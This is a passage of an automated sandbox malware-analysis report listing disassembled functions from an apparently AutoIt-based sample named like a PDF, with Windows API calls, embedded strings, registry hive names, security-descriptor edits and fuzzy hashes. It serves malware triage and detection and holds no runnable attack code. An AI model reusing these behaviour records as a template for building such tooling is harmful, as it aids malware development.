                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: BuffCharMessageSendUpper
                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                            • API String ID: 3974292440-4258414348
                                                            • Opcode ID: 7c29f2111df6182fb412ed45fa542974ecec4b737f4540a9301fe0fdac6b63ad
                                                            • Instruction ID: f302b8c32c6919452fa48e633cb7b22d4afe691f3de7550daa51dee48ce37c80
                                                            • Opcode Fuzzy Hash: 7c29f2111df6182fb412ed45fa542974ecec4b737f4540a9301fe0fdac6b63ad
                                                            • Instruction Fuzzy Hash: DB91A1346083058FCB18EF50C451AAEB7A1BF59314F05846CF99A5B7A3DB70ED4ADB82
                                                            Function 0017BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0017BB6E
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00179431), ref: 0017BBCA
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0017BC03
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0017BC46
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0017BC7D
                                                            • FreeLibrary.KERNEL32(?), ref: 0017BC89
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0017BC99
                                                            • DestroyIcon.USER32(?,?,?,?,?,00179431), ref: 0017BCA8
                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0017BCC5
                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0017BCD1
                                                              • Part of subcall function 0011313D: __wcsicmp_l.LIBCMT ref: 001131C6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                            • String ID: .dll$.exe$.icl
                                                            • API String ID: 1212759294-1154884017
                                                            • Opcode ID: edbce833c5746b4b43e94134659f78e2803365cb3dca57a1271370974669223b
                                                            • Instruction ID: eecbee17a803bf4e8ec2b28a326bc66bc193570aa8bc4241bc6cadc6e0e68bc4
                                                            • Opcode Fuzzy Hash: edbce833c5746b4b43e94134659f78e2803365cb3dca57a1271370974669223b
                                                            • Instruction Fuzzy Hash: 0361BF71508219BAEB18DF64CC86FFA77B8EF08720F108119F919D61D1DB74AA90DBA0
                                                            Function 0015A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
                                                              • Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C
                                                            • CharLowerBuffW.USER32(?,?), ref: 0015A636
                                                            • GetDriveTypeW.KERNEL32 ref: 0015A683
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0015A6CB
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0015A702
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0015A730
                                                              • Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            • API String ID: 2698844021-4113822522
                                                            • Opcode ID: 5a3b318d8c0b98d43f68379a43fa1465cd7565689983e863797b3dcaa9857ac6
                                                            • Instruction ID: 2e07da960a6cb07a0758d9b4881b27af5aaa41e12a53e34659d1cd82ffbf13e9
                                                            • Opcode Fuzzy Hash: 5a3b318d8c0b98d43f68379a43fa1465cd7565689983e863797b3dcaa9857ac6
                                                            • Instruction Fuzzy Hash: 38517A751043099FC700EF20C9819AAB7F4FF98718F44496DF99A57662DB31AE0ACF92
                                                            Function 0015A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0015A47A
                                                            • __swprintf.LIBCMT ref: 0015A49C
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0015A4D9
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0015A4FE
                                                            • _memset.LIBCMT ref: 0015A51D
                                                            • _wcsncpy.LIBCMT ref: 0015A559
                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0015A58E
                                                            • CloseHandle.KERNEL32(00000000), ref: 0015A599
                                                            • RemoveDirectoryW.KERNEL32(?), ref: 0015A5A2
                                                            • CloseHandle.KERNEL32(00000000), ref: 0015A5AC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 2733774712-3457252023
                                                            • Opcode ID: c9d8f1f4191421f01502c893782e2d561098a3c29cf4e3c4c553ad666f253f7a
                                                            • Instruction ID: d4c34c7920c1b3325bc4921abc4d22409b7af874e23f97c28ec7d8421ce2a473
                                                            • Opcode Fuzzy Hash: c9d8f1f4191421f01502c893782e2d561098a3c29cf4e3c4c553ad666f253f7a
                                                            • Instruction Fuzzy Hash: 7431B275544219ABDB20DFA0DC48FEB37BCEF88701F5041BAF919D6150E77096858B25
                                                            Function 0015DB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __wsplitpath.LIBCMT ref: 0015DC7B
                                                            • _wcscat.LIBCMT ref: 0015DC93
                                                            • _wcscat.LIBCMT ref: 0015DCA5
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0015DCBA
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0015DCCE
                                                            • GetFileAttributesW.KERNEL32(?), ref: 0015DCE6
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 0015DD00
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0015DD12
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                            • String ID: *.*
                                                            • API String ID: 34673085-438819550
                                                            • Opcode ID: 4ca703e64b0a635e837abb92c702241cb81b9527ae4b1a0c10c95f539fc5e3ac
                                                            • Instruction ID: 80c4b8640f0412c0cd55ae14218108a12423c2081967fc23438aae772790a64a
                                                            • Opcode Fuzzy Hash: 4ca703e64b0a635e837abb92c702241cb81b9527ae4b1a0c10c95f539fc5e3ac
                                                            • Instruction Fuzzy Hash: 4281B271504201DFCB34DF64D8419AEB7E9BB89301F15882EFCA9CB251E730D989CB52
                                                            Function 0017C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623
                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0017C4EC
                                                            • GetFocus.USER32 ref: 0017C4FC
                                                            • GetDlgCtrlID.USER32(00000000), ref: 0017C507
                                                            • _memset.LIBCMT ref: 0017C632
                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0017C65D
                                                            • GetMenuItemCount.USER32(?), ref: 0017C67D
                                                            • GetMenuItemID.USER32(?,00000000), ref: 0017C690
                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0017C6C4
                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0017C70C
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0017C744
                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0017C779
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                            • String ID: 0
                                                            • API String ID: 1296962147-4108050209
                                                            • Opcode ID: 8bbf5efec4124dab2a71efe4a215319dc9df792854e6e50c53c520b29b0d1c2d
                                                            • Instruction ID: 5fe471250664d2c3dd53482974dac69a39938bac7209cb9e97c983adb7281f43
                                                            • Opcode Fuzzy Hash: 8bbf5efec4124dab2a71efe4a215319dc9df792854e6e50c53c520b29b0d1c2d
                                                            • Instruction Fuzzy Hash: A0819E70608301AFD714CF14C984AABBBF8FB98314F10852DF99997291DB71D985CFA2
                                                            Function 001483F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0014874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00148766
                                                              • Part of subcall function 0014874A: GetLastError.KERNEL32(?,0014822A,?,?,?), ref: 00148770
                                                              • Part of subcall function 0014874A: GetProcessHeap.KERNEL32(00000008,?,?,0014822A,?,?,?), ref: 0014877F
                                                              • Part of subcall function 0014874A: HeapAlloc.KERNEL32(00000000,?,0014822A,?,?,?), ref: 00148786
                                                              • Part of subcall function 0014874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0014879D
                                                              • Part of subcall function 001487E7: GetProcessHeap.KERNEL32(00000008,00148240,00000000,00000000,?,00148240,?), ref: 001487F3
                                                              • Part of subcall function 001487E7: HeapAlloc.KERNEL32(00000000,?,00148240,?), ref: 001487FA
                                                              • Part of subcall function 001487E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00148240,?), ref: 0014880B
                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00148458
                                                            • _memset.LIBCMT ref: 0014846D
                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0014848C
                                                            • GetLengthSid.ADVAPI32(?), ref: 0014849D
                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 001484DA
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001484F6
                                                            • GetLengthSid.ADVAPI32(?), ref: 00148513
                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00148522
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00148529
                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0014854A
                                                            • CopySid.ADVAPI32(00000000), ref: 00148551
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00148582
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001485A8
                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001485BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                            • String ID:
                                                            • API String ID: 3996160137-0
                                                            • Opcode ID: 365533409a453183f1cdd711cf2dd96442d6c173ccab574c98532f302c0a2ebe
                                                            • Instruction ID: d895895e75a4e4f875bb5f6d1333e30c535b78f20684e301ebf7769f6701fc70
                                                            • Opcode Fuzzy Hash: 365533409a453183f1cdd711cf2dd96442d6c173ccab574c98532f302c0a2ebe
                                                            • Instruction Fuzzy Hash: 1561387190021AAFDF10DFA4DC45AEEBBB9FF04304F148269F915AB2A1DB319A45DF60
                                                            Function 0016762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 001676A2
                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 001676AE
                                                            • CreateCompatibleDC.GDI32(?), ref: 001676BA
                                                            • SelectObject.GDI32(00000000,?), ref: 001676C7
                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0016771B
                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00167757
                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0016777B
                                                            • SelectObject.GDI32(00000006,?), ref: 00167783
                                                            • DeleteObject.GDI32(?), ref: 0016778C
                                                            • DeleteDC.GDI32(00000006), ref: 00167793
                                                            • ReleaseDC.USER32(00000000,?), ref: 0016779E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                            • String ID: (
                                                            • API String ID: 2598888154-3887548279
                                                            • Opcode ID: dc399b8280b03573b6d3bd5792587203c47428d4cc9fbc085aedbddf78080cfa
                                                            • Instruction ID: 957edaa905a1985c631fc04b88cc33864103ce8e1829480fd2b6006176fd7cd6
                                                            • Opcode Fuzzy Hash: dc399b8280b03573b6d3bd5792587203c47428d4cc9fbc085aedbddf78080cfa
                                                            • Instruction Fuzzy Hash: DF515775904209EFDB15CFA8CC88EAFBBB9EF48710F14842DF94A97250D731A881CB60
                                                            Function 0015A0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadStringW.USER32(00000066,?,00000FFF,0017FB78), ref: 0015A0FC
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
                                                            • LoadStringW.USER32(?,?,00000FFF,?), ref: 0015A11E
                                                            • __swprintf.LIBCMT ref: 0015A177
                                                            • __swprintf.LIBCMT ref: 0015A190
                                                            • _wprintf.LIBCMT ref: 0015A246
                                                            • _wprintf.LIBCMT ref: 0015A264
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: LoadString__swprintf_wprintf$_memmove
                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                            • API String ID: 311963372-2391861430
                                                            • Opcode ID: 8327fb51d13fc0b71eaccf09ae6a337afb4ebe1ba15e082cf689410a6938dc05
                                                            • Instruction ID: 809dda5b22cdc79352cffc7a54bd60f96ab8de50f68f0182e090a756bf29ef21
                                                            • Opcode Fuzzy Hash: 8327fb51d13fc0b71eaccf09ae6a337afb4ebe1ba15e082cf689410a6938dc05
                                                            • Instruction Fuzzy Hash: CE51803194020DAADF15EBE0CD86EFEB779AF14300F500265F619625A2DB316F98DB52
                                                            Function 000F6BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00110B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,000F6C6C,?,00008000), ref: 00110BB7
                                                              • Part of subcall function 000F48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000F48A1,?,?,000F37C0,?), ref: 000F48CE
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 000F6D0D
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 000F6E5A
                                                              • Part of subcall function 000F59CD: _wcscpy.LIBCMT ref: 000F5A05
                                                              • Part of subcall function 0011387D: _iswctype.LIBCMT ref: 00113885
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                            • API String ID: 537147316-1018226102
                                                            • Opcode ID: 9a145e8aab7f161ab1cfe9b907594f0d69eb531f875f5e64fc3628fcb4106897
                                                            • Instruction ID: 123ca2f3d873786fd7e6d385e188c3ac9f5f689c2ecad603c73b87b0ef91f375
                                                            • Opcode Fuzzy Hash: 9a145e8aab7f161ab1cfe9b907594f0d69eb531f875f5e64fc3628fcb4106897
                                                            • Instruction Fuzzy Hash: B802AC315083459FC724EF24C881AAFBBE5BF99314F04092DF68A976A2DB31D949DB43
                                                            Function 000F45DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 000F45F9
                                                            • GetMenuItemCount.USER32(001B6890), ref: 0012D7CD
                                                            • GetMenuItemCount.USER32(001B6890), ref: 0012D87D
                                                            • GetCursorPos.USER32(?), ref: 0012D8C1
                                                            • SetForegroundWindow.USER32(00000000), ref: 0012D8CA
                                                            • TrackPopupMenuEx.USER32(001B6890,00000000,?,00000000,00000000,00000000), ref: 0012D8DD
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0012D8E9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                            • String ID:
                                                            • API String ID: 2751501086-0
                                                            • Opcode ID: 8c2e469afbe4fee58d64876d135e14843481f06647a476aafb54cec4e9dc4e60
                                                            • Instruction ID: 87d5c264089e4a46d8bbfd4c4668ce0df6a447605342f0fa83c41c049a1141cc
                                                            • Opcode Fuzzy Hash: 8c2e469afbe4fee58d64876d135e14843481f06647a476aafb54cec4e9dc4e60
                                                            • Instruction Fuzzy Hash: C071E771600219BEFB249F54EC85FABBF64FF05368F204216FA28A61E1C7B55860DB91
                                                            Function 001710A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00170038,?,?), ref: 001710BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                            • API String ID: 3964851224-909552448
                                                            • Opcode ID: cceec31c913220a7c8a21f0eecc23c7250b0cd82e94e2affaa86ee5eba3a0c4e
                                                            • Instruction ID: e9c707f7525a3cbe0530a54089f66a02c62dd217df33cb5a3ffb2b7f8efc94dc
                                                            • Opcode Fuzzy Hash: cceec31c913220a7c8a21f0eecc23c7250b0cd82e94e2affaa86ee5eba3a0c4e
                                                            • Instruction Fuzzy Hash: 3441AF3450428E9BCF15EF94ED91AEA3734BF26310F518024FD956B283DB70A99ACB51
                                                            Function 00155569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66
                                                              • Part of subcall function 000F7A84: _memmove.LIBCMT ref: 000F7B0D
                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 001555D2
                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 001555E8
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001555F9
                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0015560B
                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0015561C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: SendString$_memmove
